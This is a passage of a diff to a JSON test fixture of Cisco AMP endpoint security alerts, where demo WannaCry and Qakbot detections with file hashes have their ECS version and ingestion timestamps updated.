                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -3433,7 +3433,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3465,7 +3465,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843646784Z",
+                "ingested": "2021-09-13T18:07:04.510407053Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3522,7 +3522,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3554,7 +3554,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843648712Z",
+                "ingested": "2021-09-13T18:07:04.510408937Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":783000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3618,7 +3618,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3650,7 +3650,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843650655Z",
+                "ingested": "2021-09-13T18:07:04.510410809Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":727000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3718,7 +3718,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3750,7 +3750,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843652586Z",
+                "ingested": "2021-09-13T18:07:04.510412707Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3809,7 +3809,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3839,7 +3839,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843654448Z",
+                "ingested": "2021-09-13T18:07:04.510414604Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3894,7 +3894,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3924,7 +3924,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843656334Z",
+                "ingested": "2021-09-13T18:07:04.510416464Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":504000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3990,7 +3990,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -4022,7 +4022,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843658227Z",
+                "ingested": "2021-09-13T18:07:04.510418340Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":426000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4092,7 +4092,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -4124,7 +4124,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843660456Z",
+                "ingested": "2021-09-13T18:07:04.510420342Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":399000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4176,7 +4176,7 @@
         {
             "@timestamp": "2021-01-14T19:10:32.000Z",
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -4194,7 +4194,7 @@
             "event": {
                 "severity": 0,
                 "action": "Policy Update",
-                "ingested": "2021-09-12T17:31:29.843662300Z",
+                "ingested": "2021-09-13T18:07:04.510422223Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662859016176000,\"timestamp\":1610651432,\"timestamp_nanoseconds\":199000000,\"date\":\"2021-01-14T19:10:32+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
                 "id": "6412662859016176000",
                 "kind": "alert"
@@ -4231,7 +4231,7 @@
         {
             "@timestamp": "2021-01-14T19:10:31.000Z",
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -4249,7 +4249,7 @@
             "event": {
                 "severity": 0,
                 "action": "Policy Update",
-                "ingested": "2021-09-12T17:31:29.843664186Z",
+                "ingested": "2021-09-13T18:07:04.510424077Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662854721208000,\"timestamp\":1610651431,\"timestamp_nanoseconds\":856000000,\"date\":\"2021-01-14T19:10:31+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
                 "id": "6412662854721208000",
                 "kind": "alert"
@@ -4291,7 +4291,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -4311,7 +4311,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:29.843666081Z",
+                "ingested": "2021-09-13T18:07:04.510425946Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":233000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -4366,7 +4366,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -4386,7 +4386,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:29.843667970Z",
+                "ingested": "2021-09-13T18:07:04.510427827Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -4441,7 +4441,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -4461,7 +4461,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:29.843669890Z",
+                "ingested": "2021-09-13T18:07:04.510429716Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -4518,7 +4518,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -4542,7 +4542,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:29.843671791Z",
+                "ingested": "2021-09-13T18:07:04.510431561Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"el2j9fcqj.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\el2j9fcqj.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}